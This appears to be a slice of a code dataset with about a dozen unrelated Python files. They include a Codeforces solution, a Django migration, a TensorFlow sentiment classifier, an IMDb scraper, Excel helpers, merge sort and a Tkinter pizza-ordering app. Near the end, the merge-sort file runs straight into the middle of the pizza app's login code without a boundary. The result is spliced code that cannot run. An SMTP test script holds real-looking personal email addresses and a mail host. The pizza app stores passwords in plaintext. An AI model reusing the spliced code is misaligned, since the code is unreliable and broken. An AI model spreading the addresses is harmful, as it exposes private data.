M_vals]\n","sub_path":"core/eig_solver.py","file_name":"eig_solver.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"491386703","text":"\"\"\"\r\n14 Arrival of the General - https://codeforces.com/problemset/problem/144/A\r\n\"\"\"\r\ninput()\r\nsol=list(map(int,input().split()))\r\nswap=0 \r\nmaxm=sol.index(max(sol))\r\n\r\nfor i in range(1,len(sol)+1):\r\n if sol[-i]==min(sol):\r\n minm=len(sol)-i\r\n break\r\nif minm>maxm:\r\n 
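# the max walks to the front and the min to the back; when the min already stands\r\n    # to the right of the max the two walks are independent, otherwise moving the max\r\n    # forward shifts the min one place right, saving one move (the -1 in the else branch)\r\n    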
swap=swap+((len(sol)-1)-minm)\r\n    swap=swap+maxm\r\nelse:\r\n    swap=swap+((len(sol)-1)-minm)\r\n    swap=swap+(maxm-1)\r\n\r\nprint(swap)\r\n \r\n","sub_path":"A2OJ-11/014_A_Arrival_of_the_General.py","file_name":"014_A_Arrival_of_the_General.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"244976911","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('payment', '0001_initial'),\n    ]\n\n    operations = [\n        migrations.RemoveField(\n            model_name='account',\n            name='reply',\n        ),\n        migrations.AddField(\n            model_name='account',\n            name='external_id',\n            field=models.CharField(default='1', max_length=40, verbose_name=b'External ID'),\n            preserve_default=False,\n        ),\n        migrations.AlterField(\n            model_name='account',\n            name='partner',\n            field=models.CharField(default=b'MANGOPAY', max_length=20, verbose_name=b'Partner', choices=[(b'MANGOPAY', b'MangoPay')]),\n        ),\n    ]\n","sub_path":"api/payment/migrations/0002_auto_20140930_1130.py","file_name":"0002_auto_20140930_1130.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"193724752","text":"import logging\nimport smtplib\n\n\ndef send_mail():\n    message = \"Test message\"\n    logging.error(message)\n    try:\n        server = smtplib.SMTP('nyc-spam1.corp.yodle.com')\n        fromaddr = \"eric.berg@yodle.com\"\n        toaddrs = [\"eric.berg@yodle.com\", \"eberg@bergbrains.com\"]\n        server.set_debuglevel(1)\n        server.sendmail(fromaddr, toaddrs, message)\n        server.quit()\n    except:\n        logging.error(\"Failed to send email to Eric\")\n\n","sub_path":"sendmail-test.py","file_name":"sendmail-test.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"509471203","text":"#this model will be a simple dnn which extracts features from\n# bags of words and timestamps to classify comments by success\n#no model savings as\nimport tensorflow as tf\nimport string\nimport nltk\nimport sqlite3\nimport traceback\nimport logging\nimport time\nimport random\nimport datetime\nimport numpy as np\nimport pandas as pd\nimport os\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n#TODO: store ngrams in db to allow model storing\n\nnodes_per_layer = 2000\nmax_results_to_analyze = 10000000\nget_newest_results = True  # if results are capped, keep only the newest so the bot stays current with the meta\nstop_word_list = list(nltk.corpus.stopwords.words('english'))\nnum_of_score_buckets = 10\nnum_of_features_per_n = 200\nnum_of_n_for_ngram = 5\nsubreddit_list = []\n\nn_classes = 2\nmodel_name = \"sentiment_model_5L_final.ckpt\"\ntemp_model_name= \"/tmp/sentiment_model_5L_final.ckpt\"\ncurrent_directory = os.getcwd()\nfinal_directory = os.path.join(current_directory, r'models')\nif not os.path.exists(final_directory):\n    os.makedirs(final_directory)\nmodel_location = os.path.join(final_directory, model_name)\n\nclass DNN_sentiment_classifier():\n\n    def __init__(self, save_model = True, load_eligible = True):\n        self.save_enabled = save_model\n        self.model_needs_retraining = False\n        self.border_values = [] # any num above this\n        self.n_gram_orders_dict = {}\n        #self.input_width = self.get_input_size()\n        self.input_width = num_of_features_per_n*(num_of_n_for_ngram - 1)\n        self.optimizer, self.cost, self.x, self.y, self.sess, self.prediction, 
self.saver = self.build_neural_network(load_eligible = load_eligible)\n\n\n    def run_text(self, text):\n        # create_input_features expects a (text, label) style pair, so wrap the raw text\n        input_features = self.create_input_features([text])\n        return self.sess.run(self.prediction, feed_dict = {self.x:[input_features]})\n\n    def train_nn(self, epochs):\n        if len(self.n_gram_orders_dict.keys()) == 0:\n            self.read_metadata(num_of_n_for_ngram, num_of_features_per_n)\n        self.train_neural_network(epochs, self.optimizer, self.cost, self.x, self.y, self.sess, self.prediction)\n        self.save_model()\n\n    def save_model(self):\n        if self.save_enabled:\n            save_path = self.saver.save(self.sess, model_location)\n            self.save_ngrams()\n            print(\"Model saved in file: %s\" % save_path)\n\n    def load_model(self, saver, sess):\n        if not os.path.exists(final_directory):\n            os.makedirs(final_directory)\n        saver.restore(sess, model_location)\n        self.load_ngrams()\n\n    def build_neural_network(self, load_eligible = True):\n        start_time = time.time()\n        #data = tf.placeholder('float')\n        x = tf.placeholder('float', [None, self.input_width])\n        y = tf.placeholder('float', [None, n_classes])\n        keep_prob = tf.placeholder(tf.float32)\n        prediction = self.neural_network_model(nodes_per_layer, x)\n        cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=prediction, labels=y))\n        optimizer = tf.train.AdamOptimizer().minimize(cost)\n        saver = tf.train.Saver()\n        sess = tf.Session()\n        if load_eligible:\n            try:\n                self.load_model(saver, sess)\n            except:\n                print('initializing')\n                traceback.print_exc()\n                sess.run(tf.global_variables_initializer())\n                self.model_needs_retraining = True\n        else:\n            print('initializing')\n            sess.run(tf.global_variables_initializer())\n            self.model_needs_retraining = True\n\n        return optimizer, cost, x, y, sess, prediction,saver\n\n    def neural_network_model(self, nodes_per_layer, x):\n        hidden_1_layer = {'weights': tf.Variable(tf.random_normal([self.input_width, nodes_per_layer])),\n                          'biases': tf.Variable(tf.random_normal([nodes_per_layer]))}\n        hidden_2_layer = {'weights': tf.Variable(tf.random_normal([nodes_per_layer, nodes_per_layer])),\n                          'biases': tf.Variable(tf.random_normal([nodes_per_layer]))}\n        hidden_3_layer = {'weights': tf.Variable(tf.random_normal([nodes_per_layer, nodes_per_layer])),\n                          'biases': tf.Variable(tf.random_normal([nodes_per_layer]))}\n        hidden_4_layer = {'weights': tf.Variable(tf.random_normal([nodes_per_layer, nodes_per_layer])),\n                          'biases': tf.Variable(tf.random_normal([nodes_per_layer]))}\n        hidden_5_layer = {'weights': tf.Variable(tf.random_normal([nodes_per_layer, nodes_per_layer])),\n                          'biases': tf.Variable(tf.random_normal([nodes_per_layer]))}\n        output_layer = {'weights': tf.Variable(tf.random_normal([nodes_per_layer, n_classes])),\n                        'biases': tf.Variable(tf.random_normal([n_classes]))}\n\n\n\n        keep_prob = .5\n        l1 = tf.add(tf.matmul(x, hidden_1_layer['weights']), hidden_1_layer['biases'])\n        l1 = tf.nn.relu(l1)\n        l2 = tf.add(tf.matmul(l1, hidden_2_layer['weights']), hidden_2_layer['biases'])\n        l2 = tf.nn.relu(l2)\n        l3 = tf.add(tf.matmul(l2, hidden_3_layer['weights']), hidden_3_layer['biases'])\n        l3 = tf.nn.relu(l3)\n        l4 = tf.add(tf.matmul(l3, hidden_4_layer['weights']), hidden_4_layer['biases'])\n        l4 = tf.nn.relu(l4)\n        l4_dropout = tf.nn.dropout(l4, keep_prob)\n        l5 = tf.add(tf.matmul(l4_dropout, hidden_5_layer['weights']), hidden_5_layer['biases'])\n        l5 = tf.nn.relu(l5)\n        l5_dropout = tf.nn.dropout(l5, keep_prob)\n        output = tf.matmul(l5_dropout, output_layer['weights']) + output_layer['biases']\n\n        return output\n\n    def train_neural_network(self, epochs, optimizer, cost, x, y, 
sess, prediction):\n        batch_size = 100\n        hm_epochs = epochs\n        inputs = get_input()\n        random.shuffle(inputs)\n        train_x, train_y, test_x, test_y = self.create_feature_sets_and_labels(inputs)\n        del inputs[:]\n\n        logger.info('training size: {0}, testing size: {1}'.format(len(train_x), len(test_x)))\n        logger.info('starting training')\n        for epoch in range(hm_epochs):\n            epoch_loss = 0\n            i=0\n            while i < len(train_x):\n                start = i\n                end = i + batch_size\n                batch_x = np.array(train_x[start:end])\n                batch_y = np.array(train_y[start:end])\n                _, c = sess.run([optimizer, cost], feed_dict= {x:batch_x, y:batch_y})\n                epoch_loss += c\n                i += batch_size\n            logger.info(\"Epoch {0} completed out of {1}, loss: {2}\".format(epoch, hm_epochs,epoch_loss))\n\n        correct = tf.equal(tf.argmax(prediction, 1), tf.argmax(y, 1))\n        accuracy = tf.reduce_mean(tf.cast(correct, 'float'))\n        accuracy_float = accuracy.eval(session = sess, feed_dict = {x:test_x, y:test_y})\n        print('Accuracy:', accuracy_float)\n        return sess, prediction, x, y\n\n    def create_feature_sets_and_labels(self, inputs, test_size = .01):\n        random.shuffle(inputs)\n        feature_list = []\n\n        for i in inputs:\n            #print(i[0], i[1])\n            feature_list.append([self.create_input_features(i), self.create_output_features(i)])\n\n        testing_size = int(test_size*len(inputs))\n        train_x = [i[0] for i in feature_list[testing_size:]]\n        train_y = [i[1] for i in feature_list[testing_size:]]\n        test_x = [i[0] for i in feature_list[:testing_size]]\n        test_y = [i[1] for i in feature_list[:testing_size]]\n        return train_x, train_y, test_x, test_y\n\n    def create_output_features(self, output):\n        if output[1] != 0 and output[1] != 1:\n            raise Exception()\n        if output[1] == 1:\n            return [1, 0]\n        else:\n            return [0, 1]\n\n    def create_input_features(self, i):\n        sentence_features = get_text_features(i[0], self.n_gram_orders_dict)\n        return sentence_features\n\n    #build ngrams and rank comments\n    #sort the ngrams by how common they are, store the most common ones\n    def read_metadata(self, max_n, num_of_features_per_n):\n        n_gram_dicts = {}\n        self.score_list = []\n        self.n_gram_orders_dict = {}\n\n        for n in range(1, max_n):\n            n_gram_dicts.setdefault(n, {})\n        res = get_input()\n        comments = []\n        for r in res:\n            comments.append(clean_and_tokenize(r[0]))\n        for comment in comments:\n            for n in range(1, max_n):\n                if len(comment) >= n:\n                    # include the final n-gram at position len(comment) - n\n                    for i in range(len(comment) - n + 1):\n                        current_value = n_gram_dicts[n].get(' '.join(comment[i:i+n]), 0)\n                        n_gram_dicts[n][' '.join(comment[i:i+n])] = current_value + 1\n                else:\n                    break\n        for n in range(1, max_n):\n            self.n_gram_orders_dict[n] = get_dict_keys_sorted_by_values(n_gram_dicts[n], num_of_features_per_n)\n\n\n    def save_ngrams(self):\n        with sqlite3.connect('reddit.db') as conn:\n            try:\n                conn.execute('drop table sentiment_table_values')\n            except:\n                pass\n            conn.execute('create table if not exists sentiment_table_values (timestamp int, n int, word TEXT, rank int)')\n            current_timestamp = int(float(datetime.datetime.now().timestamp()))\n            for n in range(1, num_of_n_for_ngram):\n                for rank, i in enumerate(self.n_gram_orders_dict[n]):\n                    # i is the n-gram string itself, not a (word, count) tuple\n                    conn.execute('insert into sentiment_table_values values (?, ?, ?, ?)', (current_timestamp, n, i, rank))\n            conn.commit()\n\n    def load_ngrams(self):\n        self.n_gram_orders_dict = {}\n        with sqlite3.connect('reddit.db') as conn:\n            max_rank = conn.execute('''select max(rank)\n                from sentiment_table_values''').fetchone()[0]\n            max_n = conn.execute('''select max(n)\n                from sentiment_table_values''').fetchone()[0]\n            for i in range(1, max_n + 1):\n                self.n_gram_orders_dict[i] 
= ['' for i in range(max_rank+1)]\n\n            for n in range(1, max_n + 1):\n                for r in range(max_rank+1):\n                    self.n_gram_orders_dict[n][r] = conn.execute('''select word from sentiment_table_values where rank = ? and n = ?''', (r, n)).fetchone()[0]\n\n#Feature creation methods:\ndef get_text_features(text, n_gram_dict):\n    word_features = [0 for i in range(len(n_gram_dict.keys())*len(n_gram_dict[1]))]\n    index = 0\n\n    formatted_word = format_text(text)\n    for n in n_gram_dict.keys():\n        for i in n_gram_dict[n]:\n            if i in formatted_word:\n                word_features[index] = 1\n            index+= 1\n    return word_features\n\ndef format_text(input_text):\n    return ' '.join(clean_and_tokenize(input_text))\n\ndef clean_and_tokenize(input_text):\n    clean_text = remove_punctuation_from_text(input_text.lower())\n    return remove_stopwords_from_list(nltk.tokenize.word_tokenize(clean_text))\n\ndef remove_stopwords_from_list(input_list):\n    results = []\n    for i in input_list:\n        if i not in stop_word_list:\n            results.append(i)\n    return results\n\ndef remove_punctuation_from_text(input_text):\n    exclude = set(string.punctuation)\n    return ''.join(ch for ch in input_text if ch not in exclude)\n\ndef get_subreddit_features(subreddit, subreddit_list):\n    subreddit_features = np.zeros(len(subreddit_list)) #[0 for i in range(len(subreddit_list))]\n    subreddit_features[subreddit_list.index(subreddit)] = 1\n    return subreddit_features\n\n#Helper methods:\ndef get_dict_keys_sorted_by_values(d, number_to_return, reverse = True):\n    sorting_list = []\n    for i in d.items():\n        sorting_list.append(i)\n    sorting_list = sorted(sorting_list, key=lambda x: x[1], reverse = reverse)\n    return [i[0] for i in sorting_list][0:number_to_return]\n\n#get parent, child, post data from db\n#allows user to only allow data from certain subreddits by passing a list of eligible subreddit ids into it\ndef get_input():\n    inputs = []\n    count = 0\n    df = pd.read_csv('SAD.csv', error_bad_lines=False)\n    for index, row in df.iterrows():\n        count += 1\n        if count > max_results_to_analyze:\n            break\n        inputs.append([row[3], row[1]])\n\n    return inputs\n\n#testing\nif __name__ == '__main__':\n    sentiment_classifier = DNN_sentiment_classifier(save_model=False, load_eligible=False)\n\n\n","sub_path":"archive/sentiment_classifier.py","file_name":"sentiment_classifier.py","file_ext":"py","file_size_in_byte":12732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"30428284","text":"# Gets the IMDb and Metacritic Score from a movie page on IMDb.\n\nfrom bs4 import BeautifulSoup, SoupStrainer\nimport requests\nfrom fake_useragent import UserAgent\n\n\ndef imdb_meta(url):\n    ua = UserAgent()\n    headers = {'User-Agent': ua.chrome}\n\n    # url = 'http://www.imdb.com/title/tt1375666/'\n\n    r = requests.get(url, headers=headers)\n\n    soup = BeautifulSoup(r.content, 'lxml', parse_only=SoupStrainer('div', id='pagecontent'))\n\n    rating = soup.find('span', itemprop='ratingValue')\n    # print(rating.text)\n\n    meta_score = soup.find('div', class_='metacriticScore')\n    # print(meta_score.text)\n\n    imdb_rating = int(float(rating.text) * 10)\n    if meta_score is not None:\n        meta_rating = int(meta_score.text)\n    else:\n        meta_rating = 0\n    return imdb_rating, 
meta_rating\n\n\n","sub_path":"ratings/imdb_rating.py","file_name":"imdb_rating.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"480611192","text":"# import unittest\nimport xlrd\nfrom openpyxl import load_workbook\nimport openpyexcel\n\n\n# class TC_Excel_utility(unittest.TestCase):\n\n# @staticmethod\ndef get_row_count(file,sheet_name):\n    workbook = openpyexcel.load_workbook(file)\n    sheet = workbook[sheet_name]\n    # sheet = workbook.get_sheet_by_name(sheet_name)\n    return sheet.max_row\n\n\n# @staticmethod\ndef get_column_count(file,sheet_name):\n    workbook = openpyexcel.load_workbook(file)\n    sheet = workbook[sheet_name]\n    # sheet = workbook.get_sheet_by_name(sheet_name)\n    return sheet.max_column\n\n\n# @staticmethod\ndef read_data(file,sheet_name,row_num,column_num):\n    workbook = openpyexcel.load_workbook(file)\n    sheet = workbook[sheet_name]\n    # sheet = workbook.get_sheet_by_name(sheet_name)\n    return sheet.cell(row=row_num,column=column_num).value\n\n\n# @staticmethod\ndef write_data(file,sheet_name,row_num,column_num,data):\n    workbook = openpyexcel.load_workbook(file)\n    sheet = workbook[sheet_name]\n    # sheet = workbook.get_sheet_by_name(sheet_name)\n    sheet.cell(row=row_num,column=column_num).value = data\n    workbook.save(file)\n\n\n# @staticmethod\ndef delete_row(file,sheet_name,row_num,no_row_delete):\n    try:\n        workbook = openpyexcel.load_workbook(file)\n        sheet = workbook[sheet_name]\n        # sheet = workbook.get_sheet_by_name(sheet_name)\n        sheet.delete_rows(row_num,no_row_delete)\n        workbook.save(file)\n    except Exception as e:\n        print(\"In Delete_row method:\",type(e).__name__)\n\n\n'''this will return the row and column index of the to_search string'''\n# @staticmethod\ndef find_row_col_as_per_serach_string(file,sheet_index,to_search_string):\n    row_idx, col_idx = 0, 0\n    book = xlrd.open_workbook(file)\n    sheet = book.sheet_by_index(sheet_index)\n    for row_idx in range(sheet.nrows):\n        row = sheet.row(row_idx)\n        for col_idx, cell in enumerate(row):\n            if cell.value == to_search_string:\n                print(\"Sheet Name :\",sheet.name)\n                print(\"Col Index:\",col_idx)\n                print(\"Row Index:\",row_idx)\n                return sheet.name,row_idx,col_idx\n\n    # ws['B'] will return all cells on the B column until the last one\n    # (similar to max_row but it's only for the B column)\n    '''for cell in ws['A']:\n        if cell.value is not None:\n            if \"58986\" in str(cell.value):\n                print('Found header with name: {} at row: {} and column: {}. 
In cell {}'.format(cell.value,cell.row,cell.column,cell))'''\n\n\n# @staticmethod\ndef search_value_in_column(file, sheet_name,search_string, column):\n    wb = load_workbook(file)\n    ws = wb[sheet_name]\n    for row in range(1, ws.max_row + 1):\n        coordinate = \"{}{}\".format(column, row)\n        if ws[coordinate].value == search_string:\n            return column, row\n    return column, None\n\n\n# @staticmethod\ndef search_value_in_col_idx(file,sheet_name,search_string, col_idx=1):\n    wb = load_workbook(file)\n    ws = wb[sheet_name]\n    for row in range(1, ws.max_row + 1):\n        if ws[row][col_idx].value == search_string:\n            return col_idx, row\n    return col_idx, None\n\n\n# @staticmethod\ndef search_value_in_row_index(file,sheet_name, search_string, row=1):\n    wb = load_workbook(file)\n    ws = wb[sheet_name]\n    for cell in ws[row]:\n        if cell.value == search_string:\n            return cell.column, row\n    return None, row\n","sub_path":"utility/Excelutility.py","file_name":"Excelutility.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"618325272","text":"import os\nimport yaml\nfrom Good_Boids_module.Update_Boids import Boids\n\nconfiguration_file = os.path.join(os.path.dirname(__file__), \"config_test.yaml\")\n\nget = Boids(configuration_file)\nbefore_positions = get.initial_positions().tolist()\nbefore_velocities = get.initial_velocities().tolist()\nafter_positions = get.update_positions().tolist()\nafter_velocities = get.update_velocities().tolist()\n\nfixture = {\"before_positions\": before_positions, \"before_velocities\": before_velocities,\n           \"after_positions\": after_positions, \"after_velocities\": after_velocities}\nfixture_file = open(\"fixture.yaml\", 'w')\nfixture_file.write(yaml.dump(fixture))\nfixture_file.close()\n","sub_path":"Good_Boids_module/tests/record_fixtures.py","file_name":"record_fixtures.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"405024035","text":"\n\n#class header\nclass _EARNER():\n\tdef __init__(self,): \n\t\tself.name = \"EARNER\"\n\t\tself.definitions = [u'someone or something that earns money: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_earner.py","file_name":"_earner.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"25725886","text":"def mergeSort(arr):\n\n\tlength = int(len(arr))\n\tmid= int(len(arr)/2)\n\n\tif length <2:\n\t\treturn arr\n\n\tleft = []\n\tright = []\n\n\tfor i in range(mid):\n\t\tleft.append(arr[i])\n\n\tfor j in range(length-mid):\n\t\tright.append(arr[mid+j])\n\n\t# print(left)\n\t# print(right)\n\n\tmergeSort(left)\n\tmergeSort(right)\n\tmerge(left, right, arr)\n\n\treturn arr\n\n\ndef merge(left, right, arr):\n\ti=0\n\tj=0\n\tk=0\n\n\tleft_len = len(left)\n\tright_len = len(right)\n\tarr_len = len(arr)\n\n\twhile i< left_len and j< right_len:\n\t\t# take from the left run on ties so no element is dropped and the sort stays stable\n\t\tif left[i] <= right[j]:\n\t\t\tarr[k] = left[i]\n\t\t\ti +=1\n\t\telse:\n\t\t\tarr[k] = right[j]\n\t\t\tj +=1\n\t\tk +=1\n\n\t# copy whatever remains of either run\n\twhile i < left_len:\n\t\tarr[k] = left[i]\n\t\ti += 1\n\t\tk += 1\n\n\twhile j < right_len:\n\t\tarr[k] = right[j]\n\t\tj += 1\n\t\tk += 1\n\n\t\tif len(res)>0:\r\n\t\t\tglobal username\r\n\t\t\tusername=res[0][1]\r\n\t\t\tglobal userid\r\n\t\t\tuserid=res[0][0]\r\n\t\t\tglobal email\r\n\t\t\temail=res[0][4]\r\n\t\t\tself.menu()\r\n
\t\telse:\r\n\t\t\tmsgbox('Sorry, wrong username or password', 'Error')\r\n\texcept:\r\n\t\tmsgbox('Sorry, user not found', 'Error')\r\n\r\n\r\n    def regi(self, conn, fname, lname, user, pas, email, mobile):\r\n\tif fname.isalpha() and lname.isalpha():\r\n\t\tif mobile.isnumeric() and len(mobile)==10:\r\n\t\t\ttry:\r\n\t\t\t\tconn.execute(\"CREATE TABLE users (id integer primary key AUTOINCREMENT, username varchar(60) unique not null, lname varchar(60), fname varchar(60), email varchar(60), mobile int, password varchar(60) not null)\")\r\n\t\t\texcept:\r\n\t\t\t\tpass\r\n\t\t\ttry:\r\n\t\t\t\tif conn.execute(\"INSERT INTO users (username, lname, fname, email, mobile, password) VALUES (?,?,?,?,?,?)\", (user, lname, fname, email, mobile, pas)):\r\n\t\t\t\t\tmsgbox('User Created', 'Success')\r\n\t\t\t\t\tconn.commit()\r\n\t\t\t\t\tself.login()\r\n\t\t\t\telse:\r\n\t\t\t\t\tmsgbox('Some error occurred', 'Error')\r\n\t\t\t\t\treturn False\r\n\t\t\texcept:\r\n\t\t\t\tmsgbox('Some error occurred', 'Error')\r\n\t\t\t\treturn False\r\n\t\telse:\r\n\t\t\tmsgbox('Mobile number must be a 10-digit numeric value', 'Error')\r\n\t\t\treturn False\r\n\telse:\r\n\t\tmsgbox('Name must contain only alphabetic characters', 'Error')\r\n\t\treturn False\r\n\r\n\r\n\r\n\r\n    def validate(self, v1,v2,v3,v4,v5,v6):\r\n\t#print(v1)\r\n\t#print(type(v1))\r\n\tif (v1.isnumeric() or v1=='') and (v2.isnumeric() or v2=='') and (v3.isnumeric() or v3=='') and (v4.isnumeric() or v4=='') and (v5.isnumeric() or v5=='') and (v6.isnumeric() or v6==''):\r\n\t\tself.order()\r\n\telse:\r\n\t\tmsgbox('Please enter a valid amount.', 'Error')\r\n\r\n\r\n    def insertinto(self, v1, v2, v3, v4, v5, v6, sume, gst, total, conn=db):\r\n\ttry:\r\n\t\tconn.execute(\"CREATE TABLE orders (id integer primary key AUTOINCREMENT, user_id integer, username varchar(60), items varchar(300), total integer, Timestamp DATETIME DEFAULT CURRENT_TIMESTAMP)\")\r\n\texcept:\r\n\t\tpass\r\n\ttry:\r\n\t\tlis='Veg Pizza('+v1+'), Deluxe Veggie('+v2+'), Veg Vaganza('+v3+'), Pepper Pizza('+v4+'), Margherita('+v5+'), Cold Drink('+v6+'), SUM('+sume+'), GST('+gst+')'\r\n\t\tconn.execute(\"INSERT INTO orders (user_id, username, items, total) VALUES (?,?,?,?)\", (userid, username, lis, total))\r\n\t\tconn.commit()\r\n\texcept:\r\n\t\tmsgbox('Sorry, some error occurred', 'Error')\r\n\r\n\r\n    def home(self):\r\n        self.scr=Tk(className=\"Pizza Management Home\")\r\n        #self.scr1.destroy()\r\n        self.scr.geometry(\"605x400\")\r\n        self.fr=Frame(self.scr,height=618,width=1366)\r\n        self.scr.resizable(False, False)\r\n        self.lab3=Label(self.fr,text=\"LOGIN\",bg=\"white\",font=(\"cooper black\",20))\r\n        self.lab3.place(x=160,y=30)\r\n        self.lab1=Label(self.fr,text=\"Username\",bg=\"white\",font=(\"default\",20))\r\n        self.lab1.place(x=30,y=100)\r\n        self.lab2=Label(self.fr,text=\"Password\",bg=\"white\",font=(\"default\",20))\r\n        self.lab2.place(x=30,y=150)\r\n        self.user=Entry(self.fr,bg=\"white\",font=(\"default\",20))\r\n        self.user.place(x=180,y=100)\r\n        self.pasd=Entry(self.fr,bg=\"white\",font=(\"default\",20),show=\"*\")\r\n        self.pasd.place(x=180,y=150)\r\n        self.fr=Frame(self.scr,bg=\"blue\",height=618,width=1366)\r\n        self.c=Canvas(self.fr,height=618,width=1366)\r\n        self.c.pack()\r\n        self.back=PhotoImage(file=\"pizzaback.png\")\r\n        self.c.create_image(300,200,image=self.back)\r\n        #self.c.create_image(683,284,image=self.back)\r\n        self.st=Button(self.fr,text=\"login\",font=(\"default\",20),command=self.login)\r\n        self.st.place(x=265,y=100)\r\n        self.si=Button(self.fr,text=\"Register\",command=self.register,font=(\"default\",20))\r\n        
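# note: the first Frame above is never packed, so only this canvas-backed Frame and its buttons are shown\r\n        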
self.si=Button(self.fr,text=\"Register\",command=self.register,font=(\"default\",20))\r\n self.si.place(x=245,y=200)\r\n self.fr.pack(fill=BOTH,expand=1)\r\n self.scr.mainloop()\r\n def register(self):\r\n self.scr.destroy()\r\n self.scr1=Tk(className=\"Pizza Management Register\")\r\n self.fr=Frame(self.scr1,bg=\"DeepSkyBlue2\",height=550,width=650)\r\n self.lab3=Label(self.fr,text=\"Customer Registration\",bg=\"white\",font=(\"default\",20))\r\n self.lab3.place(x=250,y=50)\r\n\r\n self.lb1=Label(self.fr,text=\"First Name\",bg=\"#d3ede6\",font=(\"default\",20))\r\n self.lb1.place(x=80,y=120)\r\n self.first=Entry(self.fr,bg=\"white\",width=15,font=(\"default\",20),bd=5)\r\n self.first.place(x=250,y=120)\r\n self.lab2=Label(self.fr,text=\"Last Name\",bg=\"#d3ede6\",font=(\"default\",20))\r\n self.lab2.place(x=80,y=170)\r\n self.last=Entry(self.fr,bg=\"white\",width=15,font=(\"default\",20),bd=5)\r\n self.last.place(x=250,y=170)\r\n \r\n self.lab1=Label(self.fr,text=\"user name\",bg=\"#d3ede6\",font=(\"default\",20))\r\n self.lab1.place(x=80,y=220)\r\n self.lab2=Label(self.fr,text=\"password\",bg=\"#d3ede6\",font=(\"default\",20))\r\n self.lab2.place(x=80,y=270)\r\n self.user=Entry(self.fr,bg=\"white\",font=(\"default\",20),bd=5)\r\n self.user.place(x=250,y=220)\r\n self.pasd=Entry(self.fr,bg=\"white\",font=(\"default\",20),bd=5,show=\"*\")\r\n self.pasd.place(x=250,y=270)\r\n\r\n self.lab5=Label(self.fr,text=\"Email ID\",bg=\"#d3ede6\",font=(\"default\",20))\r\n self.lab5.place(x=80,y=320)\r\n self.email=Entry(self.fr,bg=\"white\",width=15,font=(\"default\",20),bd=5)\r\n self.email.place(x=250,y=320)\r\n self.lab6=Label(self.fr,text=\"Mobile No.\",bg=\"#d3ede6\",font=(\"default\",20))\r\n self.lab6.place(x=80,y=370)\r\n self.mob=Entry(self.fr,bg=\"white\",width=15,font=(\"default\",20),bd=5)\r\n self.mob.place(x=250,y=370)\r\n self.st=Button(self.fr,text=\"submit\",font=(\"default\",20),command=lambda : self.regi(db, self.first.get(), self.last.get(), self.user.get(), self.pasd.get(), self.email.get(), self.mob.get()))\r\n self.st.place(x=200,y=450)\r\n #self.hm=Button(self.fr,text=\"Home\",font=(\"default\",20),command=self.login)\r\n #self.hm.place(x=300, y=450)\r\n self.si=Button(self.fr,text=\"clear\",command=self.clear,font=(\"default\",20))\r\n self.si.place(x=380,y=450) \r\n self.fr.pack(fill=BOTH,expand=1)\r\n self.scr1.mainloop()\r\n def login(self):\r\n try:\r\n \tself.scr.destroy()\r\n except:\r\n \tpass\r\n try:\r\n \tself.scr1.destroy()\r\n except:\r\n \tpass\r\n self.scr1=Tk(className=\"Pizza Management Login\")\r\n self.fr=Frame(self.scr1,bg=\"DeepSkyBlue2\",height=400,width=600)\r\n self.lab3=Label(self.fr,text=\"Login\",bg=\"white\",font=(\"default\",20))\r\n self.lab3.place(x=250,y=50)\r\n self.lab1=Label(self.fr,text=\"user name\",bg=\"white\",font=(\"default\",20))\r\n self.lab1.place(x=80,y=120)\r\n self.lab2=Label(self.fr,text=\"password\",bg=\"white\",font=(\"default\",20))\r\n self.lab2.place(x=80,y=170)\r\n self.user=Entry(self.fr,bg=\"white\",font=(\"default\",20))\r\n self.user.place(x=250,y=120)\r\n self.pasd=Entry(self.fr,bg=\"white\",font=(\"default\",20),show=\"*\")\r\n self.pasd.place(x=250,y=170)\r\n self.st=Button(self.fr,text=\"submit\",font=(\"default\",20),command=lambda : self.loginv(self.user.get(), self.pasd.get()))\r\n self.st.place(x=200,y=250)\r\n self.si=Button(self.fr,text=\"clear\",command=self.clear,font=(\"default\",20))\r\n self.si.place(x=380,y=250)\r\n self.fr.pack(fill=BOTH,expand=1)\r\n 
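# hand control to the Tk event loop of the login window; the widgets above stay responsive until it is destroyed\r\n 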
